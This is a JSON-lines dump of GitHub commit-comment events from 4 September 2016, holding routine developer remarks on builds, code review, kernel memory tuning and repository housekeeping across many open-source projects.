{"id":"4514090558","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18893676,"position":null,"line":null,"path":null,"commit_id":"ac47cbaff974a7ad51a9b93875e5c7a28c400556","created_at":"2016-09-04T17:30:04Z","updated_at":"2016-09-04T17:30:04Z","body":"Yes. I moved Xenial builds out from not so busy (near to exotic) boards A20 Orange Pi and A31 Bananapi M2"}},"created_at":"2016-09-04T17:30:04Z"}
{"id":"4514090563","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893677,"position":null,"line":null,"path":null,"commit_id":"5d46ddf3f1cbc766ff5bb85221f187712f800e40","created_at":"2016-09-04T17:30:04Z","updated_at":"2016-09-04T17:30:04Z","body":"Sorry, didn't check for that. The bump was needed to fix the build of orbment."}},"created_at":"2016-09-04T17:30:04Z"}
{"id":"4514095823","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18893687,"position":36,"line":71,"path":"app/src/main/java/com/kamron/pogoiv/MainActivity.java","commit_id":"2234723be4f73c2a5b459686169ae5a260871619","created_at":"2016-09-04T17:34:07Z","updated_at":"2016-09-04T17:34:07Z","body":"Would it be possible to avoid changes unrelated to the actual commit?"}},"created_at":"2016-09-04T17:34:07Z"}
{"id":"4514098345","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"vutran/editorconfig"},"payload":{"comment":{"id":18893692,"position":null,"line":null,"path":null,"commit_id":"8c8cabf77db35476159cc8f52150037dbcc10d8a","created_at":"2016-09-04T17:36:01Z","updated_at":"2016-09-04T17:36:01Z","body":"😉"}},"created_at":"2016-09-04T17:36:01Z"}
{"id":"4514098545","type":"CommitCommentEvent","actor":{"login":"mmanohara"},"repo":{"name":"mmanohara/CAR-T-cell-modeling-project"},"payload":{"comment":{"id":18893694,"position":null,"line":null,"path":null,"commit_id":"069c093c8f071e9070616110a007d5c050e14ca2","created_at":"2016-09-04T17:36:10Z","updated_at":"2016-09-04T17:36:10Z","body":"This is the code for treatment 7"}},"created_at":"2016-09-04T17:36:10Z"}
{"id":"4514098836","type":"CommitCommentEvent","actor":{"login":"huanlei"},"repo":{"name":"huanlei/note"},"payload":{"comment":{"id":18893696,"position":1,"line":1,"path":"LICENSE.md","commit_id":"6280c17bbb2e698b8b2a7dbe83b7577c403f1500","created_at":"2016-09-04T17:36:21Z","updated_at":"2016-09-04T17:36:21Z","body":"javascript 高级程序设计"}},"created_at":"2016-09-04T17:36:21Z"}
{"id":"4514100213","type":"CommitCommentEvent","actor":{"login":"FaithLV"},"repo":{"name":"FaithLV/PCSX2-Spectabis"},"payload":{"comment":{"id":18893697,"position":null,"line":null,"path":null,"commit_id":"b170b469a54aebb70ee8f4455c2d043171133cc9","created_at":"2016-09-04T17:37:27Z","updated_at":"2016-09-04T17:37:27Z","body":"Also, game library now properly resizes to window."}},"created_at":"2016-09-04T17:37:27Z"}
{"id":"4514100218","type":"CommitCommentEvent","actor":{"login":"fred777"},"repo":{"name":"CyanogenMod/android_kernel_motorola_omap4-common"},"payload":{"comment":{"id":18893698,"position":null,"line":null,"path":null,"commit_id":"3c2e7737e24a4b1a49367ff991c5458fc4bc4d3f","created_at":"2016-09-04T17:37:27Z","updated_at":"2016-09-04T17:37:27Z","body":"Ok, thanks for clarifying - I'll see what I can do...\r\n\r\nFor the moment, I am pretty happing with the following setup:\r\n1.) leave zram as is (400MB, swappiness=100)\r\n2.) overcommit_ratio = 100 (not sure if it makes any difference...)\r\n3.) increase extra_free_kbytes! This turned out to improve things very much (I have it at 36MB currently, maybe to much, but it seems to prevent kswapd direct reclaim and let lowmemorykiller be more effective, just a guess)\r\n\r\nI was even able to lower lowmemkiller watermarks (2048/4096/8192/16384/24576/32768 aka aggressive-profile in kernel adiutor) without any negative impact so far.\r\n\r\nFor playing around with kernel source code, I'll have to setup the build toolchain first, which I don't have enough time for atm."}},"created_at":"2016-09-04T17:37:27Z"}
{"id":"4514103555","type":"CommitCommentEvent","actor":{"login":"danez"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18893702,"position":null,"line":null,"path":null,"commit_id":"b3dca4fb5a5b775b3a893bc098dfb79a5616d720","created_at":"2016-09-04T17:40:00Z","updated_at":"2016-09-04T17:40:00Z","body":"They are all published prefectly fine as far as I can check:\r\n```\r\n❯ npm dist-tag ls babel-types\r\nlatest: 6.15.0\r\n```\r\n\r\nNotice that babel uses a global version for all packages, but not all packages get released all the time if they haven't changed since the last version. If you look at the changelog you can see which packages were bumped to the new version by looking at the titles within a version: https://github.com/babel/babel/blob/master/CHANGELOG.md\r\n\r\nIf your problem persists feel free to join our slack channel and ask for help. (see readme for more info)"}},"created_at":"2016-09-04T17:40:00Z"}
{"id":"4514103760","type":"CommitCommentEvent","actor":{"login":"Carli2020"},"repo":{"name":"Carli2020/hallo-whirld"},"payload":{"comment":{"id":18893704,"position":1,"line":1,"path":"README.md","commit_id":"62752605f2a87ae28e891a038574c8300a16a51d","created_at":"2016-09-04T17:40:09Z","updated_at":"2016-09-04T17:40:09Z","body":"DOCTYPE HTML>\r\n\t<html>\r\n    <head>\r\n      <title>C@Rli</title>\r\n    </head>\r\n    <body>\r\n    <header><h2>C@rli</h2></header>\r\n    <br>\r\n<a href=\"https:wwww.w3.org/WAI\">WAI</a> <a href=\"https://github.com\">GitHub</a> <a href=\"https://www.youtube.com/channel/UCyle-61Y8C4-o-zZCtO4ETQ\">DevTips</a> <a href=\"http://mono.company/journal/design-practice/the-10-commandments-of-good-form-design-on-the-web\">MONO Journal Good Web Design 10 Commandments</a>\r\n<br>\r\n<nav>\r\n<ul>\r\n\t<li><h3>Fave Foods</h3></li>\r\n\t<li>Salmon</li>\r\n\t<li>Brown Rice with Steamed veggies</li>\r\n\t<li>Fruit; Pears, Bananas, Mangos, Raspberries... &amp; etc.</li>\r\n\t<li>Protein Smoothies</li>\r\n<br>\r\n    <li><h3>Achievements</h3></li> \r\n    <li>BA (in History)</li>\r\n    <li>First Coursera course in Alzheimer's &amp; Dementia Care</li>\r\n    <li>Lean &amp; 5S Management Training at work </li>\r\n    <li>HTML5 &amp; Web Design Specialization courses</li>\r\n<br>\r\n    <li><h3>More about C</h3>\r\n    <li>I have an insatiable love of learning.</li>\r\n    <li>A constant impulse to create drives me.</li>\r\n    <li>Communication and Creative Expression cause me to pause, listen, look, see...</li>\r\n    <li>Conversation comes first in the book of me, then the written word and then the other muses, graces and forms of idea-sharing...</li>\r\n</ul>\r\n</nav>\r\n<br>\r\n<footer>\r\n\t<a href=\"http://www.intro-webdesign.com/images/newlogo.png\"><img src=\"http://www.intro-webdesign.com/images/newlogo.png\" alt=\"Web Design Logo\" width=\"\"50%></a>\r\n</footer>\r\n     </body>\r\n\t</html>"}},"created_at":"2016-09-04T17:40:09Z"}
{"id":"4514103906","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893706,"position":null,"line":null,"path":null,"commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T17:40:13Z","updated_at":"2016-09-04T17:40:13Z","body":"@deshipu : Here's a clever way to handle multiplexing and save bunch of bytes. It also includes fix for SPI peripheral naming which was raised during previous review. Please test if possible. (I tested that by passing appropriate IDs, a suitable peripheral class is instantiated, and that kwargs parsed properly).\r\n"}},"created_at":"2016-09-04T17:40:13Z"}
{"id":"4514104046","type":"CommitCommentEvent","actor":{"login":"games647"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18893707,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T17:40:19Z","updated_at":"2016-09-04T17:40:19Z","body":"@loveGhb Why? Java 7 is deprecated since months. Java 8 has better performance and a lot more features."}},"created_at":"2016-09-04T17:40:19Z"}
{"id":"4514105055","type":"CommitCommentEvent","actor":{"login":"games647"},"repo":{"name":"games647/FastLogin"},"payload":{"comment":{"id":18893711,"position":null,"line":null,"path":null,"commit_id":"b660951e1e9215a901e06568c9fa0f4e0fc65a6d","created_at":"2016-09-04T17:41:03Z","updated_at":"2016-09-04T17:41:03Z","body":"See my comment on Spigot. Jenkins automatically builds on changes."}},"created_at":"2016-09-04T17:41:03Z"}
{"id":"4514107285","type":"CommitCommentEvent","actor":{"login":"unintendedbear"},"repo":{"name":"geneura-papers/2016-PPSN"},"payload":{"comment":{"id":18893713,"position":null,"line":null,"path":null,"commit_id":"6f8668e6c1be8dbd3c3477c303286ea43b993f33","created_at":"2016-09-04T17:42:49Z","updated_at":"2016-09-04T17:42:49Z","body":"These files (.gitignore, LICENSE, etc...) were already created, but inside the GPRules folder, which I created to make room in the repo for the PPSN workshop paper... "}},"created_at":"2016-09-04T17:42:49Z"}
{"id":"4514107972","type":"CommitCommentEvent","actor":{"login":"agateau"},"repo":{"name":"agateau/listviewdragitem"},"payload":{"comment":{"id":18893714,"position":null,"line":null,"path":null,"commit_id":"147eff0c0aff14b05145babac8a9bcc4e6e61ef8","created_at":"2016-09-04T17:43:20Z","updated_at":"2016-09-04T17:43:20Z","body":"Hi @jf---, Sorry for the late answer.\r\n\r\nI haven't seriously used DelegateModel yet. I played with the GridView example from http://doc.qt.io/qt-5/qtquick-draganddrop-views-gridview-qml.html which is quite nice, but it was easy to get rid of the DelegateModel and achieve the same result, the only change was to adjust the call in DropArea.onEntered.\r\n\r\nBased on this limited experience, I don't think DelegateModel brings much, but as I don't know it very well, I could be wrong."}},"created_at":"2016-09-04T17:43:20Z"}
{"id":"4514110154","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":18893716,"position":null,"line":null,"path":null,"commit_id":"10bcde7d47a4bad1a75986083b76e6d4ced00b3c","created_at":"2016-09-04T17:44:57Z","updated_at":"2016-09-04T17:44:57Z","body":"Whoops.  I must have still had it in old location. "}},"created_at":"2016-09-04T17:44:57Z"}
{"id":"4514110236","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"SamVerschueren/alfred-link"},"payload":{"comment":{"id":18893717,"position":6,"line":38,"path":"lib/plist-transform.js","commit_id":"137419390361f1b926ccc3f728b9f49876d45a72","created_at":"2016-09-04T17:45:03Z","updated_at":"2016-09-04T17:45:03Z","body":"You don't need `typeof pkg.author === 'object'` anymore. The normalization ensures it's always an object."}},"created_at":"2016-09-04T17:45:03Z"}
{"id":"4514111033","type":"CommitCommentEvent","actor":{"login":"afgomezb"},"repo":{"name":"afgomezb/Talabarteria"},"payload":{"comment":{"id":18893718,"position":null,"line":null,"path":null,"commit_id":"4dc5a24430ce47b1ca7d141717e3077c96ad277c","created_at":"2016-09-04T17:45:38Z","updated_at":"2016-09-04T17:45:38Z","body":"Se agregaron herramientas para el desarrollo del proyecto"}},"created_at":"2016-09-04T17:45:38Z"}
{"id":"4514113205","type":"CommitCommentEvent","actor":{"login":"Nayoshi12"},"repo":{"name":"Next-On-Top/AI"},"payload":{"comment":{"id":18893720,"position":null,"line":null,"path":null,"commit_id":"a3a0a50fb1b9fabd829e53254a41fa820e5bd71c","created_at":"2016-09-04T17:47:10Z","updated_at":"2016-09-04T17:47:10Z","body":"dat cool"}},"created_at":"2016-09-04T17:47:10Z"}
{"id":"4514114509","type":"CommitCommentEvent","actor":{"login":"yixuan"},"repo":{"name":"cdeterman/gpuR"},"payload":{"comment":{"id":18893723,"position":null,"line":null,"path":null,"commit_id":"ebe17c6f67a197da548911022f21aeb6b7041bbc","created_at":"2016-09-04T17:48:11Z","updated_at":"2016-09-04T17:48:11Z","body":"When I tried to build the `develop` branch of `gpuR` I found that `initContexts()` always caused segfault with an Intel GPU but never failed with Nvidia. Maybe it is related to the Intel graphics card driver. Do you think it is necessary to call `initContexts()` during package loading?"}},"created_at":"2016-09-04T17:48:11Z"}
{"id":"4514114732","type":"CommitCommentEvent","actor":{"login":"fergunet"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893725,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T17:48:18Z","updated_at":"2016-09-04T17:48:18Z","body":"( Sorry for the offtopic, but just wanted to say hi to @rhiever :) Big fan of your tweets and subreddit! )"}},"created_at":"2016-09-04T17:48:18Z"}
{"id":"4514114966","type":"CommitCommentEvent","actor":{"login":"harveychurch"},"repo":{"name":"Nerdomads/mazzcalc2.0"},"payload":{"comment":{"id":18893726,"position":null,"line":null,"path":null,"commit_id":"95a09586dfbc89c2aa49f37b4b7cdcb4b10c951b","created_at":"2016-09-04T17:48:29Z","updated_at":"2016-09-04T17:48:29Z","body":"What dis for?\r\n"}},"created_at":"2016-09-04T17:48:29Z"}
{"id":"4514115810","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18893727,"position":null,"line":null,"path":null,"commit_id":"6655a2cde35de8e36fb087617b0a4e45930c44d3","created_at":"2016-09-04T17:49:03Z","updated_at":"2016-09-04T17:49:03Z","body":"@DaMadBoy did you test this? Are you sure it will only work with ObjectMgr.h?"}},"created_at":"2016-09-04T17:49:03Z"}
{"id":"4514116455","type":"CommitCommentEvent","actor":{"login":"dekrain"},"repo":{"name":"TheBrokenRail/scratch-render"},"payload":{"comment":{"id":18893730,"position":null,"line":null,"path":null,"commit_id":"f1f6fe6b9f683fdb2459116b57c5a3e190131108","created_at":"2016-09-04T17:49:33Z","updated_at":"2016-09-04T17:49:33Z","body":"What are changed here?"}},"created_at":"2016-09-04T17:49:33Z"}
{"id":"4514119241","type":"CommitCommentEvent","actor":{"login":"SamVerschueren"},"repo":{"name":"SamVerschueren/alfred-link"},"payload":{"comment":{"id":18893732,"position":6,"line":38,"path":"lib/plist-transform.js","commit_id":"137419390361f1b926ccc3f728b9f49876d45a72","created_at":"2016-09-04T17:51:35Z","updated_at":"2016-09-04T17:51:35Z","body":"Sweet!"}},"created_at":"2016-09-04T17:51:35Z"}
{"id":"4514121126","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893736,"position":null,"line":null,"path":null,"commit_id":"5d46ddf3f1cbc766ff5bb85221f187712f800e40","created_at":"2016-09-04T17:53:01Z","updated_at":"2016-09-04T17:53:01Z","body":"Didn't know these fix the mesa issue, no worries then :)"}},"created_at":"2016-09-04T17:53:01Z"}
{"id":"4514122438","type":"CommitCommentEvent","actor":{"login":"davidmolina"},"repo":{"name":"OperationCode/operationcode"},"payload":{"comment":{"id":18893737,"position":null,"line":null,"path":null,"commit_id":"d94e5725dde6e2a7468ea5e74f4b89b217dc910b","created_at":"2016-09-04T17:54:00Z","updated_at":"2016-09-04T17:54:00Z","body":".... good stopping point. cc @hollomancer @rickr "}},"created_at":"2016-09-04T17:54:00Z"}
{"id":"4514123510","type":"CommitCommentEvent","actor":{"login":"lukewendling"},"repo":{"name":"Sotera/watchman"},"payload":{"comment":{"id":18893741,"position":4,"line":3,"path":"server/server.js","commit_id":"d2ddb6fbb81ba3fc8238cfe655a512937a6bf7be","created_at":"2016-09-04T17:54:49Z","updated_at":"2016-09-04T17:54:49Z","body":"@justinlueders can we set this back to true?"}},"created_at":"2016-09-04T17:54:49Z"}
{"id":"4514125607","type":"CommitCommentEvent","actor":{"login":"lukewendling"},"repo":{"name":"Sotera/watchman"},"payload":{"comment":{"id":18893743,"position":9,"line":20,"path":"client/modules/core/views/partials/footer.jade","commit_id":"d2ddb6fbb81ba3fc8238cfe655a512937a6bf7be","created_at":"2016-09-04T17:56:10Z","updated_at":"2016-09-04T17:56:10Z","body":"duuude, wicked"}},"created_at":"2016-09-04T17:56:10Z"}
{"id":"4514125717","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893744,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T17:56:14Z","updated_at":"2016-09-04T17:56:14Z","body":"Should be SPI here, not HSPI?"}},"created_at":"2016-09-04T17:56:14Z"}
{"id":"4514128341","type":"CommitCommentEvent","actor":{"login":"DaMadBoy"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18893750,"position":null,"line":null,"path":null,"commit_id":"6655a2cde35de8e36fb087617b0a4e45930c44d3","created_at":"2016-09-04T17:58:06Z","updated_at":"2016-09-04T17:58:06Z","body":"@xfurry I did test it yes. I redownloaded the core from github and tried to build it. It kept giving the error 'sObjectMgr' was not declared in this scope. As soon as I added that line the build continued until another error with guardianAI which I posted details about on the forums."}},"created_at":"2016-09-04T17:58:06Z"}
{"id":"4514128451","type":"CommitCommentEvent","actor":{"login":"mpnow"},"repo":{"name":"evernote/evernote-cloud-sdk-windows"},"payload":{"comment":{"id":18893751,"position":null,"line":null,"path":null,"commit_id":"35fb554fcc5aa9a505ae58696b00c10162363633","created_at":"2016-09-04T17:58:10Z","updated_at":"2016-09-04T17:58:10Z","body":"This fixes #29."}},"created_at":"2016-09-04T17:58:10Z"}
{"id":"4514128761","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893753,"position":22,"line":117,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T17:58:22Z","updated_at":"2016-09-04T17:58:22Z","body":"Why do we need to pass this argument here?"}},"created_at":"2016-09-04T17:58:22Z"}
{"id":"4514130900","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893755,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T17:59:53Z","updated_at":"2016-09-04T17:59:53Z","body":"Yes, of course you're right (I had forgotten that for a moment!).\nI've been trying to find a fast solution myself, to no avail...\nPerhaps have a look here, as there are a few ideas (I lack the time to check not): http://stackoverflow.com/questions/11253027/algorithm-to-find-the-total-number-of-connected-sets-in-a-matrix\n"}},"created_at":"2016-09-04T17:59:53Z"}
{"id":"4514131541","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893756,"position":null,"line":null,"path":null,"commit_id":"5d46ddf3f1cbc766ff5bb85221f187712f800e40","created_at":"2016-09-04T18:00:15Z","updated_at":"2016-09-04T18:00:15Z","body":"I don't think this fixes https://github.com/NixOS/nixpkgs/issues/16779"}},"created_at":"2016-09-04T18:00:15Z"}
{"id":"4514132742","type":"CommitCommentEvent","actor":{"login":"mehlah"},"repo":{"name":"carrierwaveuploader/carrierwave-i18n"},"payload":{"comment":{"id":18893762,"position":null,"line":null,"path":null,"commit_id":"a80851d9a64811265eb8f9ac07b7329bf05987f9","created_at":"2016-09-04T18:00:51Z","updated_at":"2016-09-04T18:00:51Z","body":"👍 "}},"created_at":"2016-09-04T18:00:51Z"}
{"id":"4514135510","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893772,"position":47,"line":182,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:02:31Z","updated_at":"2016-09-04T18:02:31Z","body":"Should there be a message?"}},"created_at":"2016-09-04T18:02:31Z"}
{"id":"4514136083","type":"CommitCommentEvent","actor":{"login":"coox"},"repo":{"name":"tchapi/pianette"},"payload":{"comment":{"id":18893773,"position":null,"line":null,"path":null,"commit_id":"d254d34ea785f707a094d765c096436b7c0e056c","created_at":"2016-09-04T18:02:52Z","updated_at":"2016-09-04T18:02:52Z","body":"https://www.youtube.com/watch?v=wUX3AK6wRzM"}},"created_at":"2016-09-04T18:02:52Z"}
{"id":"4514136098","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18893774,"position":3,"line":152,"path":"src/opnsense/mvc/app/views/OPNsense/Cron/index.volt","commit_id":"c3daf44a7c9ffd102ef76dc76972cd1f13fb0129","created_at":"2016-09-04T18:02:52Z","updated_at":"2016-09-04T18:02:52Z","body":"@AdSchellevis this button is missing translation"}},"created_at":"2016-09-04T18:02:52Z"}
{"id":"4514136590","type":"CommitCommentEvent","actor":{"login":"cxcorp"},"repo":{"name":"JaniL/tkoalybot"},"payload":{"comment":{"id":18893775,"position":null,"line":null,"path":null,"commit_id":"e1e970a2a8846f673ff9ee35fad88ff557b8b7f0","created_at":"2016-09-04T18:03:10Z","updated_at":"2016-09-04T18:03:10Z","body":"nautin tästä suuresti"}},"created_at":"2016-09-04T18:03:10Z"}
{"id":"4514138062","type":"CommitCommentEvent","actor":{"login":"robertdkingjr"},"repo":{"name":"robertdkingjr/GEM_AMC"},"payload":{"comment":{"id":18893777,"position":null,"line":null,"path":null,"commit_id":"2a0eb80ec44f1055fb20f8c3df4a968c9fd7d6f2","created_at":"2016-09-04T18:04:11Z","updated_at":"2016-09-04T18:04:11Z","body":"Changes:\r\n-Added feature: To call single command once, add flag '-e' (execute) followed by desired command\r\n\r\n-Fixed bug involving more than 10 OHs ('OH1*' including 'OH10', 'OH11', etc.)\r\n-Fixed bug calling non-OH-specific modules (ttc, gemsystem, fw)\r\n\r\nNotes:\r\n-Calling single command still requires parsing of entire XML beforehand. Currently takes ~10 secs..."}},"created_at":"2016-09-04T18:04:11Z"}
{"id":"4514138166","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18893779,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T18:04:16Z","updated_at":"2016-09-04T18:04:16Z","body":"I think he was joking ;)"}},"created_at":"2016-09-04T18:04:16Z"}
{"id":"4514138511","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893781,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T18:04:34Z","updated_at":"2016-09-04T18:04:34Z","body":"This seems interesting too (from Falcon's author):\nhttp://www.ise.bgu.ac.il/faculty/felner/newsite/publications/blockage.pdf\n"}},"created_at":"2016-09-04T18:04:34Z"}
{"id":"4514139144","type":"CommitCommentEvent","actor":{"login":"zita212"},"repo":{"name":"openwrt-vgv7519/uboot-bin"},"payload":{"comment":{"id":18893783,"position":null,"line":null,"path":null,"commit_id":"76fdd8e638f81e324ffe77856481bd147398f6e8","created_at":"2016-09-04T18:05:05Z","updated_at":"2016-09-04T18:05:05Z","body":"I also thank to The Lizard for making the software and to TimelessNL and Cornel for the comments to the forum which were invaluable. I never managed to boot the ram image after transferring via jtag, the router was reset but still booting the original bootloader. However the u-boot  flash image did flash correctly and after that I uploaded via TFTP a self compiled OpenWRT image (latest ChaosCalmer trunk) which also worked but seemed a bit basic compared with my TP-LINK WDR4300 with OpenWRT. It could probably be fixed by adding modules for 3G USB modem support, etc, but instead I installed (via sysupgrade) a LEDE image.\r\nThis is also working but is missing LUCI. When I run opkg update it shows it can update the package list from the repositories on the internet but when I run opkg install luci-ssl it complains there is nu such package, I wonder if I should configure opkg to look in other repositories than default - anyone faced this problem with LEDE ? From what I could glance in forums. lede fork is closer in having all components working on VG7519 including all USB ports and VDSL compared to main OpenWRT branch."}},"created_at":"2016-09-04T18:05:05Z"}
{"id":"4514139280","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"games647/FastLogin"},"payload":{"comment":{"id":18893784,"position":null,"line":null,"path":null,"commit_id":"b660951e1e9215a901e06568c9fa0f4e0fc65a6d","created_at":"2016-09-04T18:05:11Z","updated_at":"2016-09-04T18:05:11Z","body":"No way to get it working with the new version? @games647 "}},"created_at":"2016-09-04T18:05:11Z"}
{"id":"4514139630","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893787,"position":null,"line":null,"path":null,"commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:05:22Z","updated_at":"2016-09-04T18:05:22Z","body":"It seems to be working, however the change is now incomplete. If it was a pull request, as it should be, we could add all the changes required in one step.\r\n\r\nYou forgot to update the documentation and the examples in all code that uses those classes."}},"created_at":"2016-09-04T18:05:22Z"}
{"id":"4514140911","type":"CommitCommentEvent","actor":{"login":"Spomky"},"repo":{"name":"lexik/LexikJWTAuthenticationBundle"},"payload":{"comment":{"id":18893790,"position":13,"line":25,"path":"DependencyInjection/Security/Factory/JWTFactory.php","commit_id":"b0e7af53a6e631b7f4c84d85b481a6e5111d162c","created_at":"2016-09-04T18:06:16Z","updated_at":"2016-09-04T18:06:16Z","body":"IMHO, you should test that the Guard class exists instead of adding a constant. "}},"created_at":"2016-09-04T18:06:16Z"}
{"id":"4514142736","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"metjus/Calculator"},"payload":{"comment":{"id":18893793,"position":null,"line":null,"path":null,"commit_id":"d6f8c0b67a96964f0697aa9866a0b048e42f61f9","created_at":"2016-09-04T18:07:43Z","updated_at":"2016-09-04T18:07:43Z","body":"`.gitignore` file is used to mark certain files or directories as not tracked. \r\nAn example would be a `dbconfig.php` file with the secret user name and database password as you don't want to upload such files here ;)\r\n**It's wise to keep this file in your repo and leave some of the defaults in as well so that windows files like `Desktop.ini` don't get committed accidentally for example**"}},"created_at":"2016-09-04T18:07:43Z"}
{"id":"4514143901","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893794,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:08:30Z","updated_at":"2016-09-04T18:08:30Z","body":"Assuming here \"H\" stands for hardware, it can be that."}},"created_at":"2016-09-04T18:08:30Z"}
{"id":"4514144049","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893795,"position":null,"line":null,"path":null,"commit_id":"530abfcb7a68822e5bf0729bde900f9737924ac4","created_at":"2016-09-04T18:08:36Z","updated_at":"2016-09-04T18:08:36Z","body":"Make #1807 into a link"}},"created_at":"2016-09-04T18:08:36Z"}
{"id":"4514144248","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893799,"position":null,"line":null,"path":null,"commit_id":"530abfcb7a68822e5bf0729bde900f9737924ac4","created_at":"2016-09-04T18:08:45Z","updated_at":"2016-09-04T18:08:45Z","body":"I mean the text"}},"created_at":"2016-09-04T18:08:45Z"}
{"id":"4514145686","type":"CommitCommentEvent","actor":{"login":"chalasr"},"repo":{"name":"lexik/LexikJWTAuthenticationBundle"},"payload":{"comment":{"id":18893804,"position":13,"line":25,"path":"DependencyInjection/Security/Factory/JWTFactory.php","commit_id":"b0e7af53a6e631b7f4c84d85b481a6e5111d162c","created_at":"2016-09-04T18:09:42Z","updated_at":"2016-09-04T18:09:42Z","body":"Nice! As you surely guessed it is just to satisfy an error condition like scrutinizer wants (see https://github.com/scrutinizer-ci/scrutinizer/issues/387), it's just ugly :("}},"created_at":"2016-09-04T18:09:42Z"}
{"id":"4514145775","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893805,"position":47,"line":182,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:09:46Z","updated_at":"2016-09-04T18:09:46Z","body":"From my point of view, not necessarily.\r\n"}},"created_at":"2016-09-04T18:09:46Z"}
{"id":"4514148710","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"rust-kr/rust-kr.org"},"payload":{"comment":{"id":18893809,"position":null,"line":null,"path":null,"commit_id":"236239e5e22b72eb7c75f49ef4b6bf733e29dbee","created_at":"2016-09-04T18:11:45Z","updated_at":"2016-09-04T18:11:45Z","body":"@Kroisse 혹시 이걸 조금 더 깔끔하게 하는법을 아시나요?"}},"created_at":"2016-09-04T18:11:45Z"}
{"id":"4514149139","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893810,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T18:12:04Z","updated_at":"2016-09-04T18:12:04Z","body":"Doesn't the standard for __repr__ say, that it should, if possible, resemble the way the class was created?"}},"created_at":"2016-09-04T18:12:04Z"}
{"id":"4514149338","type":"CommitCommentEvent","actor":{"login":"StarMariner"},"repo":{"name":"StarMariner/Asterix"},"payload":{"comment":{"id":18893811,"position":null,"line":null,"path":null,"commit_id":"0ec454e3a52a1ee73d27470cfeadbd21f47df0c6","created_at":"2016-09-04T18:12:11Z","updated_at":"2016-09-04T18:12:11Z","body":"// May decide to use a datalist array instead of CASE switches . Would make it easier to add new filetypes later on."}},"created_at":"2016-09-04T18:12:11Z"}
